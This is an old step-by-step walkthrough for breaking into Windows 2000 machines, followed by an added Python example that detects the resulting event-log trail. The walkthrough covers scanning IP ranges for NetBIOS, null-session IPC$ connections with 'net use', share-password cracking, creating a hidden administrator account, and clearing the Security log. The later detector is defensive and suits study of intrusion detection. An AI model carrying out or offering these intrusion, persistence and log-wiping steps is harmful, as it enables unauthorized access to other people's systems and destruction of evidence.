Before starting, you need to be running a Win2k system:
Superscan version 3.00 by Foundstone (246kb)
NetBrute Scanner 18.104.22.168 (247KB)
PQWak V1.0 (24KB)
Step 1: Scanning for Open Win2k Systems
2. Select an IP range
3. Check "Only scan responsive pings" and "All selected ports in list"
4. Only scan ports 139 (NetBIOS) and 1025 (Network Blackjack)
5. When a system with both NetBIOS and Blackjack open is found, open NetBrute and scan that IP to see if there is an IPC$ share
Step 2: Connecting to the IPC$
2. Type in: net use \\ipaddress\ipc$ "" /user:administrator
3. If you connect to the system, it will say "The command was completed successfully"
4. If it says bad username or password, try running PQWak.exe to crack the share password, then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
5. Users usually have only one password for everything, so try the c$ share password as the administrator password to connect to the IPC$.
Step 3: Connecting Using Computer Management
2. Click Action, then Connect to Another Computer
3. Type in the IP address.
Step 4: Creating User Accounts and Adding Them to a Group
2. If prompted to type a username and password, type Administrator with no password.
3. To create a user account, type the following: Net user username password /add
4. Replace Username and password with whatever you like.
5. To add the user account to the administrators group, type the following: net localgroup administrators username /add (or, on a domain, net group administrators username /add).
Step 5: Covering Your Tracks
2. While logged on to Computer Management, check in Event Viewer whether the Security log is being audited. If it is, clear it.
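Every step above leaves a footprint in the target's Security log if auditing is on: the null session shows up as a network logon by ANONYMOUS LOGON, the administrator connection as a network logon shortly afterwards from the same address, the new account as an account-created event followed by a group-membership change, and the clean-up as an audit-log-cleared event. The following is an added, defender-side example (not part of the original walkthrough) that runs that chain of checks over a few constructed log records. The event IDs used (540, 624, 636, 517) are the classic Windows 2000/2003 Security log IDs; the pipe-delimited record format, the sample data, and the 15-minute correlation window are assumptions made for this example, not a real Event Viewer export format.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Classic Windows 2000/2003 Security log event IDs.
EVENT_NETWORK_LOGON = 540              # successful network (type 3) logon
EVENT_ACCOUNT_CREATED = 624            # user account created
EVENT_LOCAL_GROUP_MEMBER_ADDED = 636   # member added to a security-enabled local group
EVENT_AUDIT_LOG_CLEARED = 517          # the audit log was cleared

# Constructed sample records in an assumed simplified format:
# "time|event_id|user|source_ip|detail" (not a real Event Viewer export).
SAMPLE_LOG = """\
2003-05-01 10:01:02|540|ANONYMOUS LOGON|192.0.2.10|Logon Type: 3
2003-05-01 10:01:09|540|Administrator|192.0.2.10|Logon Type: 3
2003-05-01 10:02:30|624|Administrator|192.0.2.10|New Account Name: backup2
2003-05-01 10:02:41|636|Administrator|192.0.2.10|Target Account Name: Administrators; Member: backup2
2003-05-01 10:03:15|517|Administrator|192.0.2.10|The audit log was cleared
2003-05-01 11:00:00|540|alice|192.0.2.55|Logon Type: 3
"""


@dataclass
class Record:
    time: datetime
    event_id: int
    user: str
    source_ip: str
    detail: str


def parse_log(text):
    """Parse the assumed pipe-delimited format into Record objects."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, eid, user, ip, detail = line.split("|", 4)
        records.append(Record(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                              int(eid), user, ip, detail))
    return records


def detect(records, window=timedelta(minutes=15)):
    """Return {source_ip: [finding, ...]} for the null-session / new-admin / log-clear chain."""
    findings = {}

    def add(ip, message):
        findings.setdefault(ip, []).append(message)

    anon_logon_at = {}        # source_ip -> time of last ANONYMOUS LOGON network logon
    created_at = {}           # source_ip -> {new account name -> creation time}

    for r in sorted(records, key=lambda rec: rec.time):
        if r.event_id == EVENT_NETWORK_LOGON and r.user.upper() == "ANONYMOUS LOGON":
            anon_logon_at[r.source_ip] = r.time
            add(r.source_ip, f"{r.time} null-session (anonymous) network logon")
        elif r.event_id == EVENT_NETWORK_LOGON and r.user.lower() == "administrator":
            # Administrator logging on over the network right after a null session
            # from the same address is the pattern the walkthrough produces.
            t = anon_logon_at.get(r.source_ip)
            if t is not None and r.time - t <= window:
                add(r.source_ip, f"{r.time} Administrator network logon {r.time - t} after a null session")
        elif r.event_id == EVENT_ACCOUNT_CREATED:
            m = re.search(r"New Account Name:\s*(\S+)", r.detail)
            if m:
                created_at.setdefault(r.source_ip, {})[m.group(1).lower()] = r.time
        elif r.event_id == EVENT_LOCAL_GROUP_MEMBER_ADDED:
            m = re.search(r"Target Account Name:\s*(\w+);\s*Member:\s*(\S+)", r.detail)
            if m and m.group(1).lower() == "administrators":
                member = m.group(2).lower()
                t = created_at.get(r.source_ip, {}).get(member)
                if t is not None and r.time - t <= window:
                    add(r.source_ip, f"{r.time} new account {member} added to Administrators {r.time - t} after creation")
        elif r.event_id == EVENT_AUDIT_LOG_CLEARED:
            # Clearing the log is itself logged as the first event of the fresh log.
            add(r.source_ip, f"{r.time} security log cleared by {r.user}")

    return findings


if __name__ == "__main__":
    for ip, messages in detect(parse_log(SAMPLE_LOG)).items():
        print(ip)
        for message in messages:
            print("  ", message)
```

Because the log-clear event survives as the first record of the emptied log, forwarding Security events to a separate host as they occur is what keeps the earlier entries available; the correlation above only works on records the attacker could not delete.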